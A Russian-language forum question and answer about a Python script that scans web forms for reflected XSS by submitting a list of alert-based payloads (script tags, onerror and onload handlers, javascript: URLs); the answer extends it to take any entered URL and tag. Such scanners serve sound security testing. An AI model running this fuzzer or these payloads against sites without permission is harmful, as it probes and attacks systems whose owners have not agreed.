Python парсинг на поиск xss-уязвимостей с вводом url, тега
У меня ниже код для парсинга на поиск xss-уязвимостей. В программе указан для проверки локальный хост, тэг. Как в input передать тэги, атрибуты Например: url_input = input (введите url:), teg_input = input (введите тег:), type_input = input (введите тип:)
import requests
from bs4 import BeautifulSoup
def test_xss(url):
payloads = [
'<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
'<script>alert("XSS")</script>',
'"><script>alert("XSS")</script>',
'"><img src=x onerror=alert("XSS")>',
'javascript:alert("XSS")',
'<body onload=alert("XSS")>',
'"><svg/onload=alert("XSS")>',
'<iframe src="javascript:alert(\'XSS\');">',
'\'"--><script>alert("XSS")</script>',
'<img src="x" onerror="alert(\'XSS\')">',
'<input type="text" value="<script>alert(\'XSS\')</script>">',
# you can add as much as you want
]
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
forms = soup.find_all('form')
found_xss = False
for form in forms:
action = form.get('action')
method = form.get('method', 'get').lower()
for payload in payloads:
data = {}
# Find inputs in the form and fill them with test data
for input_tag in form.find_all('input'):
input_name = input_tag.get('name')
input_type = input_tag.get('type', 'text')
if input_type == 'text':
data[input_name] = payload
elif input_type == 'hidden':
data[input_name] = input_tag.get('value', '')
if method == 'post':
response = requests.post(url + action, data=data)
else:
response = requests.get(url + action, params=data)
if payload in response.text:
print(f'XSS found ({payload}): {url + action}')
found_xss = True
break
if not found_xss:
print(f'XSS not found: {url}')
test_url = 'http://127.0.0.1:5000'
test_xss(test_url)
Ответы (1 шт):
Автор решения: Максимка
→ Ссылка
import re
import urllib.parse as up
import requests
from bs4 import BeautifulSoup
PAYLOADS = [
'<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
'<script>alert("XSS")</script>',
'"><script>alert("XSS")</script>',
'"><img src=x onerror=alert("XSS")>',
'javascript:alert("XSS")',
'<body onload=alert("XSS")>',
'"><svg/onload=alert("XSS")>',
'<iframe src="javascript:alert(\'XSS\');">',
'\'"--><script>alert("XSS")</script>',
'<img src="x" onerror="alert(\'XSS\')">',
'<input type="text" value="<script>alert(\'XSS\')</script>">',
]
def build_full_url(base: str, action: str) -> str:
action = action or ""
return up.urljoin(base, action)
def test_xss(url: str, tag_hint: str = "form") -> None:
url = url.strip()
if not url.startswith(("http://", "https://")):
url = "http://" + url
print(f"[+] Получение {url} …")
try:
resp = requests.get(url, timeout=10)
resp.raise_for_status()
except requests.RequestException as e:
print(f"[!] Не удаётся найти {url}: {e}")
return
soup = BeautifulSoup(resp.text, "html.parser")
tags = soup.find_all(re.compile(tag_hint, re.I))
if not tags:
print(f"[!] Нет найденных тегов <{tag_hint}> .")
return
print(f"[+] Тег найден {len(tags)} <{tag_hint}> .")
found = False
for tag in tags:
action = build_full_url(url, tag.get("action"))
method = tag.get("method", "get").lower()
for payload in PAYLOADS:
data = {}
for inp in tag.find_all("input"):
name = inp.get("name")
if not name:
continue
inp_type = inp.get("type", "text").lower()
if inp_type == "text":
data[name] = payload
else:
data[name] = inp.get("value", "")
try:
if method == "post":
r = requests.post(action, data=data, timeout=10)
else:
r = requests.get(action, params=data, timeout=10)
except requests.RequestException as e:
print(f"[!] Запрос не выполнен {action}: {e}")
continue
if payload in r.text:
print(f"[+] XSS найдена! Загрузчик: {payload} @ {action}")
found = True
break
if not found:
print("[-] Нет найденных загрузчиков.")
target = input("Enter URL: ").strip()
hint = input("Enter tag to fuzz inside (form / input / textarea …) [form]: ").strip()
if not hint:
hint = "form"
test_xss(target, hint)